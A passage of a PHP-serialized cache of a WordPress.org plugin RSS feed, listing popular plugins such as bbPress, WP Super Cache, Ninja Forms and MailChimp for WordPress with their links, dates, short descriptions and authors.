\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:7:\"bbPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:49:\"https://wordpress.org/plugins/bbpress/#post-14709\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 13 Dec 2009 00:05:51 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"14709@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:50:\"bbPress is forum software, made the WordPress way.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:17:\"John James Jacoby\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:14;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:19:\"Google XML Sitemaps\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:64:\"https://wordpress.org/plugins/google-sitemap-generator/#post-132\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 09 Mar 2007 22:31:32 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"132@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:105:\"This plugin will generate a special XML sitemap which will help search engines to better index your blog.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Arne Brachhold\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:15;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"WP Smush.it\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"https://wordpress.org/plugins/wp-smushit/#post-7936\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 04 Dec 2008 00:00:37 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"7936@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:148:\"Improve performance and get faster load times by optimizing image files with Smush.it for WordPress – “It's the best plugin of its kind.”\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:10:\"Alex Dunae\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:16;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"WP Statistics\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:55:\"https://wordpress.org/plugins/wp-statistics/#post-25318\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 20 Mar 2011 09:03:36 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"25318@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:44:\"Complete statistics for your WordPress site.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Mostafa Soufi\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:17;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"Smart Website Tools by AddThis\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:48:\"https://wordpress.org/plugins/addthis/#post-8124\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 17 Dec 2008 16:03:39 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"8124@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:124:\"AddThis provides the best sharing, social, recommended content, and conversion tools to help you make \nyour website smarter.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"_mjk_\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:18;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"BackUpWordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"https://wordpress.org/plugins/backupwordpress/#post-2236\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 02 Sep 2007 21:15:07 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"2236@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:59:\"Simple automated backups of your WordPress powered website.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"Tom Willmot\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:19;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"WP Super Cache\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:55:\"https://wordpress.org/plugins/wp-super-cache/#post-2572\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 05 Nov 2007 11:40:04 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"2572@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:73:\"A very fast caching engine for WordPress that produces static html files.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"Donncha O Caoimh\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:20;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:7:\"Captcha\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:49:\"https://wordpress.org/plugins/captcha/#post-26129\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 27 Apr 2011 05:53:50 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"26129@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:79:\"This plugin allows you to implement super security captcha form into web forms.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"bestwebsoft\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:21;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"Ninja Forms\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"https://wordpress.org/plugins/ninja-forms/#post-33147\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 20 Dec 2011 18:11:48 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"33147@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:142:\"Forms created with a simple drag and drop interface. Contact forms, Email collection forms, or any other form you want on your WordPress site.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:7:\"kstover\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:22;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"WPtouch Mobile Plugin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:48:\"https://wordpress.org/plugins/wptouch/#post-5468\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 01 May 2008 04:58:09 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"5468@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"Make your WordPress website mobile-friendly with just a few clicks.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:17:\"BraveNewCode Inc.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:23;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"TinyMCE Advanced\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:57:\"https://wordpress.org/plugins/tinymce-advanced/#post-2082\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 27 Jun 2007 15:00:26 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"2082@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:71:\"Enables the advanced features of TinyMCE, the WordPress WYSIWYG editor.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:10:\"Andrew Ozz\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:24;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"WP Retina 2x\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:54:\"https://wordpress.org/plugins/wp-retina-2x/#post-39551\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 22 Jun 2012 11:25:41 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"39551@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:73:\"Make your website look beautiful and crisp on Retina / High DPI displays.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:10:\"Jordy Meow\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:25;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"Contact Form\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:61:\"https://wordpress.org/plugins/contact-form-plugin/#post-26890\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 26 May 2011 07:34:58 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"26890@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:43:\"Add Contact Form to your WordPress website.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"bestwebsoft\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:26;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:23:\"MailChimp for WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:58:\"https://wordpress.org/plugins/mailchimp-for-wp/#post-54377\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 10 Jun 2013 17:32:11 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"54377@https://wordpress.org/plugins/\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:138:\"The best MailChimp plugin to get more email subscribers. Easily add MailChimp sign-up forms and sign-up checkboxes to your WordPress site.\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"Danny van Kooten\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:27;a:6:{s:4:\"data\";s:30:\"\n \n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"W3 Total 